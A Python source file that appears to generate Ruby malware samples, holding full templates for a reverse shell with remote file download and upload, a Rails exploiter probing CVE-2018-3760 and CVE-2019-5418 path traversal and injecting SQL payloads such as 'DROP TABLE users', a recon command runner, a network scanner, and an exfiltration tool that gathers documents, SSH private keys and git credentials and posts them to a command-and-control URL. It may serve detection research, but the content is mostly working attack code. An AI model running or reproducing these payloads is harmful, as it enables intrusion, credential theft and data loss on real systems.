#!/usr/bin/env python3
"""
Ruby 样本生成器 - Sample Generator v2.0

功能:
- Metasploit 风格 payload
- Rails 漏洞利用
- 系统命令执行
- 网络扫描
- 数据外传
- 持久化
"""

from .base_generator import BaseGenerator


class RubyGenerator(BaseGenerator):
    """Ruby 恶意样本生成器"""
    
    ATTACK_TYPES = [
        'metasploit_payload',    # Metasploit Payload
        'rails_exploit',         # Rails 漏洞利用
        'command_execution',     # 命令执行
        'network_scanner',       # 网络扫描
        'data_exfiltration',     # 数据外传
        'persistence',           # 持久化
    ]
    
    def __init__(self, config=None):
        super().__init__(language='ruby', config=config)
    
    def _get_ruby_templates(self) -> dict:
        return {
            'metasploit_payload': '''# Metasploit-style Payload - Ruby
# Generated by Sample Generator v2.0
# Attack Type: Metasploit Payload
# MITRE ATT&CK: T1059.002 (Command and Scripting Interpreter: Ruby)

require 'socket'
require 'open3'

class ReverseShell
  attr_accessor :host, :port
  
  def initialize(host, port)
    @host = host
    @port = port
  end
  
  def connect
    puts "Connecting to #{@host}:#{@port}..."
    @socket = TCPSocket.new(@host, @port)
    puts "Connected!"
  end
  
  def execute_command(cmd)
    stdout_stderr, stdin, status = Open3.popen3(cmd)
    output = stdout_stderr.read
    @socket.puts(output)
  rescue => e
    @socket.puts("Error: #{e.message}")
  end
  
  def shell
    @socket.puts("Shell session opened")
    @socket.puts("System: #{`uname -a`.strip}")
    @socket.puts("User: #{`whoami`.strip}")
    @socket.puts("")
    
    loop do
      @socket.print("shell> ")
      cmd = @socket.gets&.chomp
      break if cmd.nil? || cmd == "exit"
      
      execute_command(cmd)
    end
  end
  
  def close
    @socket&.close
  end
end

class MeterpreterStyle
  def initialize(socket)
    @socket = socket
  end
  
  def sysinfo
    info = {
      "Computer" => `hostname`.strip,
      "OS" => `uname -s`.strip,
      "Architecture" => `uname -m`.strip,
      "User" => `whoami`.strip,
      "PID" => Process.pid.to_s,
    }
    @socket.puts(info.to_json)
  end
  
  def pwd
    @socket.puts(Dir.pwd)
  end
  
  def ls(path = ".")
    files = Dir.glob("#{path}/*").map do |f|
      stat = File.stat(f)
      type = stat.directory? ? "d" : "-"
      "#{type}#{stat.mode.to_s(8)[-3..-1]} #{f}"
    end
    @socket.puts(files.join("\\n"))
  end
  
  def cat(file)
    content = File.read(file)
    @socket.puts(content)
  rescue => e
    @socket.puts("Error: #{e.message}")
  end
  
  def download(remote_path, local_path)
    content = File.read(remote_path)
    @socket.puts("DOWNLOAD_START")
    @socket.puts(content.bytesize)
    @socket.send(content, 0)
    @socket.puts("DOWNLOAD_END")
  end
  
  def upload(local_path, remote_path)
    @socket.puts("UPLOAD_START")
    size = @socket.gets.chomp.to_i
    content = @socket.recv(size)
    File.write(remote_path, content)
    @socket.puts("UPLOAD_COMPLETE")
  end
end

# Main
if __FILE__ == $0
  puts "============================================"
  puts "Metasploit-style Payload v2.0"
  puts "============================================"
  
  host = ARGV[0] || "127.0.0.1"
  port = (ARGV[1] || "4444").to_i
  
  shell = ReverseShell.new(host, port)
  
  begin
    shell.connect
    shell.shell
  rescue => e
    puts "Connection failed: #{e.message}"
  ensure
    shell.close
  end
  
  puts ""
  puts "============================================"
  puts "Session complete!"
  puts "============================================"
end
''',
            
            'rails_exploit': '''# Rails Exploit - Ruby
# Generated by Sample Generator v2.0
# Attack Type: Rails Vulnerability Exploitation
# MITRE ATT&CK: T1190 (Exploit Public-Facing Application)

require 'net/http'
require 'json'

class RailsExploiter
  attr_accessor :target
  
  def initialize(target)
    @target = target
  end
  
  # CVE-2018-3760 - Path Traversal
  def exploit_path_traversal
    puts "Testing CVE-2018-3760 (Path Traversal)..."
    
    payload = "/assets/file:%2f%2f/etc/passwd"
    url = "#{@target}#{payload}"
    
    response = Net::HTTP.get(URI(url))
    
    if response.include?("root:")
      puts "[✓] Vulnerable to path traversal!"
      puts response.lines.first(5).join
    else
      puts "[✗] Not vulnerable"
    end
  end
  
  # CVE-2019-5418 - File Content Disclosure
  def exploit_file_disclosure
    puts "\\nTesting CVE-2019-5418 (File Content Disclosure)..."
    
    target_file = "/etc/passwd"
    payload = "/{{{{..{}"}}*14}#{target_file}"
    
    uri = URI("#{@target}/")
    uri.path = payload.gsub("{{", "%7B").gsub("}}", "%7D")
    
    begin
      response = Net::HTTP.get(uri)
      
      if response.include?("root:")
        puts "[✓] Vulnerable to file disclosure!"
        puts response.lines.first(5).join
      else
        puts "[✗] Not vulnerable"
      end
    rescue => e
      puts "[✗] Error: #{e.message}"
    end
  end
  
  # SQL Injection in ActiveRecord
  def test_sql_injection
    puts "\\nTesting SQL Injection..."
    
    payloads = [
      "' OR '1'='1",
      "1; DROP TABLE users--",
      "' UNION SELECT NULL--",
    ]
    
    payloads.each do |payload|
      url = "#{@target}/users?id=#{payload}"
      
      begin
        response = Net::HTTP.get(URI(url))
        
        if response.match?(/SQL syntax|mysql_fetch|ORA-|PostgreSQL/)
          puts "[✓] SQL Injection detected with payload: #{payload}"
        end
      rescue => e
        # Ignore
      end
    end
  end
  
  # Extract database information
  def extract_database_info
    puts "\\nExtracting database information..."
    
    # This would use the SQL injection to extract data
    puts "In real exploit, would extract:"
    puts "  - Database version"
    puts "  - Table names"
    puts "  - Column names"
    puts "  - User credentials"
  end
end

# Main
if __FILE__ == $0
  puts "============================================"
  puts "Rails Exploitation Tool v2.0"
  puts "============================================"
  
  target = ARGV[0] || "http://localhost:3000"
  
  exploiter = RailsExploiter.new(target)
  exploiter.exploit_path_traversal
  exploiter.exploit_file_disclosure
  exploiter.test_sql_injection
  exploiter.extract_database_info
  
  puts ""
  puts "============================================"
  puts "Exploitation complete!"
  puts "============================================"
end
''',
            
            'command_execution': '''# Command Execution - Ruby
# Generated by Sample Generator v2.0
# Attack Type: Command Execution
# MITRE ATT&CK: T1059.002 (Command and Scripting Interpreter: Ruby)

class CommandExecutor
  def execute(cmd)
    puts "Executing: #{cmd}"
    result = `#{cmd} 2>&1`
    puts result
    result
  end
  
  def execute_safe(cmd)
    # Use system() for safer execution
    puts "Executing (safe): #{cmd}"
    system(cmd)
  end
  
  def execute_with_popen(cmd)
    # Use popen for interactive execution
    puts "Executing (interactive): #{cmd}"
    IO.popen(cmd) do |io|
      io.each_line { |line| puts line }
    end
  end
end

class SystemRecon
  def initialize(executor)
    @executor = executor
  end
  
  def collect_info
    puts "\\n=== System Information ==="
    @executor.execute("uname -a")
    
    puts "\\n=== User Information ==="
    @executor.execute("whoami")
    @executor.execute("id")
    
    puts "\\n=== Network Information ==="
    @executor.execute("ip addr 2>/dev/null || ifconfig")
    
    puts "\\n=== Running Processes ==="
    @executor.execute("ps aux | head -20")
    
    puts "\\n=== Listening Ports ==="
    @executor.execute("netstat -tlnp 2>/dev/null || ss -tlnp")
  end
end

class FileOperations
  def initialize(executor)
    @executor = executor
  end
  
  def read_file(path)
    puts "\\nReading: #{path}"
    @executor.execute("cat #{path}")
  end
  
  def write_file(path, content)
    puts "\\nWriting to: #{path}"
    File.write(path, content)
    puts "Written successfully"
  end
  
  def search_files(pattern, directory = "/")
    puts "\\nSearching for: #{pattern} in #{directory}"
    @executor.execute("find #{directory} -name '*#{pattern}*' 2>/dev/null")
  end
end

# Main
if __FILE__ == $0
  puts "============================================"
  puts "Command Execution Tool v2.0"
  puts "============================================"
  
  executor = CommandExecutor.new
  
  # Interactive mode
  if ARGV[0] == "shell"
    puts "Interactive shell mode"
    puts "Type 'exit' to quit"
    puts ""
    
    loop do
      print "cmd> "
      cmd = gets.chomp
      break if cmd == "exit"
      executor.execute(cmd)
    end
  else
    # Recon mode
    recon = SystemRecon.new(executor)
    recon.collect_info
    
    # File operations demo
    files = FileOperations.new(executor)
    files.search_files("passwd", "/etc")
  end
  
  puts ""
  puts "============================================"
  puts "Execution complete!"
  puts "============================================"
end
''',
            
            'network_scanner': '''# Network Scanner - Ruby
# Generated by Sample Generator v2.0
# Attack Type: Network Scanning
# MITRE ATT&CK: T1046 (Network Service Scanning)

require 'socket'
require 'timeout'

class PortScanner
  attr_accessor :target, :ports
  
  def initialize(target, ports = [21, 22, 23, 25, 53, 80, 110, 143, 443, 445, 3306, 3389, 5432, 8080])
    @target = target
    @ports = ports
  end
  
  def scan_port(port)
    Timeout.timeout(1) do
      socket = TCPSocket.new(@target, port)
      socket.close
      return true
    rescue
      return false
    end
  end
  
  def scan
    puts "Scanning #{@target}..."
    puts "Ports: #{@ports.join(', ')}"
    puts ""
    
    open_ports = []
    
    @ports.each do |port|
      if scan_port(port)
        puts "[OPEN]  Port #{port}"
        open_ports << port
      else
        puts "[CLOSED] Port #{port}"
      end
    end
    
    puts ""
    puts "Scan complete. Open ports: #{open_ports.join(', ')}"
    open_ports
  end
  
  def identify_services(open_ports)
    puts "\\nIdentifying services..."
    
    services = {
      21 => "FTP",
      22 => "SSH",
      23 => "Telnet",
      25 => "SMTP",
      53 => "DNS",
      80 => "HTTP",
      110 => "POP3",
      143 => "IMAP",
      443 => "HTTPS",
      445 => "SMB",
      3306 => "MySQL",
      3389 => "RDP",
      5432 => "PostgreSQL",
      8080 => "HTTP-Proxy",
    }
    
    open_ports.each do |port|
      service = services[port] || "Unknown"
      puts "  Port #{port}: #{service}"
    end
  end
end

class HostScanner
  def scan_subnet(subnet)
    puts "Scanning subnet: #{subnet}.0/24"
    puts ""
    
    live_hosts = []
    
    (1..254).each do |i|
      ip = "#{subnet}.#{i}"
      
      # Ping scan
      result = `ping -c 1 -W 1 #{ip} 2>/dev/null`
      
      if $?.success?
        puts "[LIVE] #{ip}"
        live_hosts << ip
      else
        print "."
      end
    end
    
    puts ""
    puts "\\nScan complete. Live hosts: #{live_hosts.join(', ')}"
    live_hosts
  end
end

# Main
if __FILE__ == $0
  puts "============================================"
  puts "Network Scanner v2.0"
  puts "============================================"
  
  target = ARGV[0] || "127.0.0.1"
  
  # Port scan
  scanner = PortScanner.new(target)
  open_ports = scanner.scan
  scanner.identify_services(open_ports)
  
  # Subnet scan (optional)
  if ARGV[1] == "subnet"
    puts ""
    subnet = target.split('.')[0..2].join('.')
    host_scanner = HostScanner.new
    live_hosts = host_scanner.scan_subnet(subnet)
    
    # Scan each live host
    live_hosts.each do |host|
      puts "\\n--- Scanning #{host} ---"
      host_scanner = PortScanner.new(host)
      host_scanner.scan
    end
  end
  
  puts ""
  puts "============================================"
  puts "Network scan complete!"
  puts "============================================"
end
''',
            
            'data_exfiltration': '''# Data Exfiltration - Ruby
# Generated by Sample Generator v2.0
# Attack Type: Data Exfiltration
# MITRE ATT&CK: T1041 (Exfiltration Over C2 Channel)

require 'net/http'
require 'json'
require 'base64'
require 'find'

class DataCollector
  attr_accessor :collected_data
  
  def initialize
    @collected_data = {
      system_info: {},
      files: [],
      credentials: [],
    }
  end
  
  def collect_system_info
    puts "Collecting system information..."
    
    @collected_data[:system_info] = {
      hostname: `hostname`.strip,
      os: `uname -a`.strip,
      user: `whoami`.strip,
      pwd: Dir.pwd,
      time: Time.now.to_s,
    }
  end
  
  def collect_files(directories, extensions)
    puts "Collecting files..."
    
    directories.each do |dir|
      next unless Dir.exist?(dir)
      
      Find.find(dir) do |path|
        if File.file?(path)
          ext = File.extname(path).downcase.gsub('.', '')
          
          if extensions.include?(ext)
            begin
              content = File.read(path)
              @collected_data[:files] << {
                path: path,
                name: File.basename(path),
                size: File.size(path),
                content: Base64.encode64(content),
              }
            rescue => e
              # Skip unreadable files
            end
          end
        end
      end
    end
    
    puts "Collected #{@collected_data[:files].length} files"
  end
  
  def collect_credentials
    puts "Collecting credentials..."
    
    # SSH keys
    ssh_dir = File.expand_path("~/.ssh")
    if Dir.exist?(ssh_dir)
      Dir.glob("#{ssh_dir}/id_*").each do |key|
        next if key.end_with?(".pub")
        begin
          @collected_data[:credentials] << {
            type: "SSH Key",
            path: key,
            content: Base64.encode64(File.read(key)),
          }
        rescue => e
          # Skip
        end
      end
    end
    
    # Git credentials
    git_cred = File.expand_path("~/.git-credentials")
    if File.exist?(git_cred)
      @collected_data[:credentials] << {
        type: "Git Credential",
        path: git_cred,
        content: Base64.encode64(File.read(git_cred)),
      }
    end
  end
  
  def to_json
    @collected_data.to_json
  end
end

class Exfiltrator
  attr_accessor :c2_url
  
  def initialize(c2_url)
    @c2_url = c2_url
  end
  
  def send_data(data_json)
    puts "Exfiltrating to C2: #{@c2_url}"
    
    uri = URI("#{@c2_url}/collect")
    http = Net::HTTP.new(uri.host, uri.port)
    
    request = Net::HTTP::Post.new(uri.path)
    request['Content-Type'] = 'application/json'
    request.body = data_json
    
    response = http.request(request)
    
    puts "Response: #{response.code}"
    puts "Exfiltration complete"
  end
end

# Main
if __FILE__ == $0
  puts "============================================"
  puts "Data Exfiltration Tool v2.0"
  puts "============================================"
  
  collector = DataCollector.new
  
  # Collect
  collector.collect_system_info
  collector.collect_files(
    [Dir.home, "#{Dir.home}/Documents", "#{Dir.home}/Desktop"],
    ['txt', 'doc', 'docx', 'pdf', 'xls', 'xlsx']
  )
  collector.collect_credentials
  
  # Package
  data_json = collector.to_json
  puts "\\nPackaged data: #{data_json.bytesize} bytes"
  
  # Exfiltrate
  c2_url = ARGV[0] || "http://127.0.0.1:8080"
  exfiltrator = Exfiltrator.new(c2_url)
  
  begin
    exfiltrator.send_data(data_json)
  rescue => e
    puts "Exfiltration failed: #{e.message}"
  end
  
  puts ""
  puts "============================================"
  puts "Exfiltration complete!"
  puts "============================================"
end
'''
        }
